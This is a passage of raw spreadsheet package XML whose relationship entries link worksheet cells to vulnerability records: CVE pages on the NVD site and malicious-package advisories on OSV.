Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42127" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42129" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5139" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58197" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58463" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58464" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6062" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61554" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61628" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61629" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61630" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61672" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61682" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61687" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61709" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61794" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61795" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61833" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61834" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63199" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63405" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63406" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63445" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63458" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6673" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68497" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71485" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77310" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77339" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8074" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81505" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81871" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83557" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84292" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84394" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84894" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84895" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85024" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85644" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87859" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88058" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88815" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88816" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88932" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9029" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90979" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91006" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91095" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91096" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9162" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96760" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17220" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17212" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17204" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17205" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17207" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17221" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17219" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GO-2026-6538" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17218" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17222" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17206" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17210" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17216" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17217" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17213" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17214" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17215" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17223" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17224" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17225" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17226" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17227" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17228" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17229" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17230" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17231" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17232" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17233" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17234" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17235" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17236" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17237" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17238" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17239" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17240" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88771" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88772" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88773" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88775" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88776" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88777" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100886" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101001" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101090" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101045" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100872" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100896" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101060" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101049" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101050" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101064" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100869" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100908" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88778" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101032" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88774" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101059" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101085" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101086" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101056" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101063" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100902" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100874" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100875" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100889" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100890" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100892" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100893" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100895" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100901" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100903" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100906" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100909" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100868" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100904" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101046" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101051" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101089" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100877" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100878" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100883" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100884" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100887" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100898" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100899" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100880" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100881" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100655" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100656" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100657" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100658" TargetMode="External" Id="rId465" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101072" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101076" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101077" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102240" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101037" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101038" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82377" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85526" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87799" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82384" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90924" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101354" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12342" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85185" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88804" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19759" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81867" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100752" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101039" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101075" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101108" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101110" TargetMode="External" Id="rId22" /><Relationship 